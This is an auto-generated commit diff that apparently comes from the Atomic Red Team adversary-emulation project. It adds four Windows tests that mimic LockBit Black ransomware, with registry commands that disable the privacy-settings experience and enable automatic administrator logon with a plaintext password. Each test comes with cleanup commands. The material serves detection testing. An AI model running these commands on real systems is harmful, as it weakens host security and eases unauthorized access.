Generated docs from job=generate-docs branch=master [ci skip]

2022-08-03 15:19:44 +00:00
parent 2add7e0c29
commit 198e6f084a
6 changed files with 240 additions and 0 deletions
@@ -315,6 +315,10 @@ defense-evasion,T1562.001,Disable or Modify Tools,28,Disable Defender Using NirS
 defense-evasion,T1562.001,Disable or Modify Tools,29,Kill antimalware protected processes using Backstab,24a12b91-05a7-4deb-8d7f-035fa98591bc,powershell
 defense-evasion,T1562.001,Disable or Modify Tools,30,WinPwn - Kill the event log services for stealth,7869d7a3-3a30-4d2c-a5d2-f1cd9c34ce66,powershell
 defense-evasion,T1562.001,Disable or Modify Tools,31,Tamper with Windows Defender ATP using Aliases - PowerShell,c531aa6e-9c97-4b29-afee-9b7be6fc8a64,powershell
+defense-evasion,T1562.001,Disable or Modify Tools,32,LockBit Black - Disable Privacy Settings Experience Using Registry -cmd,d6d22332-d07d-498f-aea0-6139ecb7850e,command_prompt
+defense-evasion,T1562.001,Disable or Modify Tools,33,LockBit Black - Use Registry Editor to turn on automatic logon -cmd,9719d0e1-4fe0-4b2e-9a72-7ad3ee8ddc70,command_prompt
+defense-evasion,T1562.001,Disable or Modify Tools,34,LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell,d8c57eaa-497a-4a08-961e-bd5efd7c9374,powershell
+defense-evasion,T1562.001,Disable or Modify Tools,35,Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell,5e27f36d-5132-4537-b43b-413b0d5eec9a,powershell
 defense-evasion,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
 defense-evasion,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
 defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
@@ -235,6 +235,10 @@ defense-evasion,T1562.001,Disable or Modify Tools,28,Disable Defender Using NirS
 defense-evasion,T1562.001,Disable or Modify Tools,29,Kill antimalware protected processes using Backstab,24a12b91-05a7-4deb-8d7f-035fa98591bc,powershell
 defense-evasion,T1562.001,Disable or Modify Tools,30,WinPwn - Kill the event log services for stealth,7869d7a3-3a30-4d2c-a5d2-f1cd9c34ce66,powershell
 defense-evasion,T1562.001,Disable or Modify Tools,31,Tamper with Windows Defender ATP using Aliases - PowerShell,c531aa6e-9c97-4b29-afee-9b7be6fc8a64,powershell
+defense-evasion,T1562.001,Disable or Modify Tools,32,LockBit Black - Disable Privacy Settings Experience Using Registry -cmd,d6d22332-d07d-498f-aea0-6139ecb7850e,command_prompt
+defense-evasion,T1562.001,Disable or Modify Tools,33,LockBit Black - Use Registry Editor to turn on automatic logon -cmd,9719d0e1-4fe0-4b2e-9a72-7ad3ee8ddc70,command_prompt
+defense-evasion,T1562.001,Disable or Modify Tools,34,LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell,d8c57eaa-497a-4a08-961e-bd5efd7c9374,powershell
+defense-evasion,T1562.001,Disable or Modify Tools,35,Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell,5e27f36d-5132-4537-b43b-413b0d5eec9a,powershell
 defense-evasion,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
 defense-evasion,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
 defense-evasion,T1027,Obfuscated Files or Information,2,Execute base64-encoded PowerShell,a50d5a97-2531-499e-a1de-5544c74432c6,powershell
@@ -453,6 +453,10 @@
  - Atomic Test #29: Kill antimalware protected processes using Backstab [windows]
  - Atomic Test #30: WinPwn - Kill the event log services for stealth [windows]
  - Atomic Test #31: Tamper with Windows Defender ATP using Aliases - PowerShell [windows]
+  - Atomic Test #32: LockBit Black - Disable Privacy Settings Experience Using Registry -cmd [windows]
+  - Atomic Test #33: LockBit Black - Use Registry Editor to turn on automatic logon -cmd [windows]
+  - Atomic Test #34: LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell [windows]
+  - Atomic Test #35: Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell [windows]
 - T1601 Modify System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -344,6 +344,10 @@
  - Atomic Test #29: Kill antimalware protected processes using Backstab [windows]
  - Atomic Test #30: WinPwn - Kill the event log services for stealth [windows]
  - Atomic Test #31: Tamper with Windows Defender ATP using Aliases - PowerShell [windows]
+  - Atomic Test #32: LockBit Black - Disable Privacy Settings Experience Using Registry -cmd [windows]
+  - Atomic Test #33: LockBit Black - Use Registry Editor to turn on automatic logon -cmd [windows]
+  - Atomic Test #34: LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell [windows]
+  - Atomic Test #35: Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell [windows]
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -17874,6 +17874,82 @@ defense-evasion:
          Set-MpPreference -dbaf 0
        name: powershell
        elevation_required: true
+    - name: LockBit Black - Disable Privacy Settings Experience Using Registry -cmd
+      auto_generated_guid: d6d22332-d07d-498f-aea0-6139ecb7850e
+      description: 'LockBit Black - Disable Privacy Settings Experience Using Registry
+
+        '
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKCU\Software\Policies\Microsoft\Windows\OOBE" /v DisablePrivacyExperience
+          /t REG_DWORD /d 1 /f
+
+          '
+        cleanup_command: 'reg delete "HKCU\Software\Policies\Microsoft\Windows\OOBE"
+          /v DisablePrivacyExperience /f >nul 2>&1
+
+          '
+        name: command_prompt
+        elevation_required: true
+    - name: LockBit Black - Use Registry Editor to turn on automatic logon -cmd
+      auto_generated_guid: 9719d0e1-4fe0-4b2e-9a72-7ad3ee8ddc70
+      description: 'LockBit Black - Use Registry Editor to turn on automatic logon
+
+        '
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          reg add "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /t REG_DWORD /d 1 /f
+          reg add "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName /t REG_SZ /d Administrator /f
+          reg add "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultDomainName /t REG_SZ /d contoso.com /f
+          reg add "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /t REG_SZ /d password1 /f
+        cleanup_command: |
+          reg delete "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /f >nul 2>&1
+          reg delete "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName /f >nul 2>&1
+          reg delete "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultDomainName /f >nul 2>&1
+          reg delete "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /f >nul 2>&1
+        name: command_prompt
+        elevation_required: true
+    - name: LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell
+      auto_generated_guid: d8c57eaa-497a-4a08-961e-bd5efd7c9374
+      description: 'LockBit Black - Disable Privacy Settings Experience Using Registry
+
+        '
+      supported_platforms:
+      - windows
+      executor:
+        command: 'New-ItemProperty "HKCU:\Software\Policies\Microsoft\Windows\OOBE"
+          -Name DisablePrivacyExperience -PropertyType DWord -Value 0 -Force
+
+          '
+        cleanup_command: 'Remove-ItemProperty "HKCU:\Software\Policies\Microsoft\Windows\OOBE"
+          -Name DisablePrivacyExperience -Force -ErrorAction Ignore
+
+          '
+        name: powershell
+        elevation_required: true
+    - name: Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell
+      auto_generated_guid: 5e27f36d-5132-4537-b43b-413b0d5eec9a
+      description: 'Lockbit Black - Use Registry Editor to turn on automatic logon
+
+        '
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          New-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name AutoAdminLogon -PropertyType DWord -Value 1 -Force
+          New-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultUserName -Value Administrator -Force
+          New-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultDomainName -Value contoso.com -Force
+          New-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultPassword  -Value password1 -Force
+        cleanup_command: |
+          Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name AutoAdminLogon -Force -ErrorAction Ignore
+          Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultUserName -Force -ErrorAction Ignore
+          Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultDomainName -Force -ErrorAction Ignore
+          Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultPassword -Force -ErrorAction Ignore
+        name: powershell
+        elevation_required: true
  T1601:
    technique:
      x_mitre_platforms:
@@ -68,6 +68,14 @@ Adversaries may also tamper with artifacts deployed and utilized by security too

 - [Atomic Test #31 - Tamper with Windows Defender ATP using Aliases - PowerShell](#atomic-test-31---tamper-with-windows-defender-atp-using-aliases---powershell)

+- [Atomic Test #32 - LockBit Black - Disable Privacy Settings Experience Using Registry -cmd](#atomic-test-32---lockbit-black---disable-privacy-settings-experience-using-registry--cmd)
+
+- [Atomic Test #33 - LockBit Black - Use Registry Editor to turn on automatic logon -cmd](#atomic-test-33---lockbit-black---use-registry-editor-to-turn-on-automatic-logon--cmd)
+
+- [Atomic Test #34 - LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell](#atomic-test-34---lockbit-black---disable-privacy-settings-experience-using-registry--powershell)
+
+- [Atomic Test #35 - Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell](#atomic-test-35---lockbit-black---use-registry-editor-to-turn-on-automatic-logon--powershell)
+

 <br/>

@@ -1332,4 +1340,144 @@ Set-MpPreference -dbaf 0



+<br/>
+<br/>
+
+## Atomic Test #32 - LockBit Black - Disable Privacy Settings Experience Using Registry -cmd
+LockBit Black - Disable Privacy Settings Experience Using Registry
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** d6d22332-d07d-498f-aea0-6139ecb7850e
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKCU\Software\Policies\Microsoft\Windows\OOBE" /v DisablePrivacyExperience /t REG_DWORD /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKCU\Software\Policies\Microsoft\Windows\OOBE" /v DisablePrivacyExperience /f >nul 2>&1
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #33 - LockBit Black - Use Registry Editor to turn on automatic logon -cmd
+LockBit Black - Use Registry Editor to turn on automatic logon
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 9719d0e1-4fe0-4b2e-9a72-7ad3ee8ddc70
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /t REG_DWORD /d 1 /f
+reg add "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName /t REG_SZ /d Administrator /f
+reg add "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultDomainName /t REG_SZ /d contoso.com /f
+reg add "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /t REG_SZ /d password1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /f >nul 2>&1
+reg delete "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName /f >nul 2>&1
+reg delete "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultDomainName /f >nul 2>&1
+reg delete "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /f >nul 2>&1
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #34 - LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell
+LockBit Black - Disable Privacy Settings Experience Using Registry
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** d8c57eaa-497a-4a08-961e-bd5efd7c9374
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+New-ItemProperty "HKCU:\Software\Policies\Microsoft\Windows\OOBE" -Name DisablePrivacyExperience -PropertyType DWord -Value 0 -Force
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-ItemProperty "HKCU:\Software\Policies\Microsoft\Windows\OOBE" -Name DisablePrivacyExperience -Force -ErrorAction Ignore
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #35 - Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell
+Lockbit Black - Use Registry Editor to turn on automatic logon
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 5e27f36d-5132-4537-b43b-413b0d5eec9a
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+New-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name AutoAdminLogon -PropertyType DWord -Value 1 -Force
+New-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultUserName -Value Administrator -Force
+New-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultDomainName -Value contoso.com -Force
+New-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultPassword  -Value password1 -Force
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name AutoAdminLogon -Force -ErrorAction Ignore
+Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultUserName -Force -ErrorAction Ignore
+Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultDomainName -Force -ErrorAction Ignore
+Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultPassword -Force -ErrorAction Ignore
+```
+
+
+
+
+
 <br/>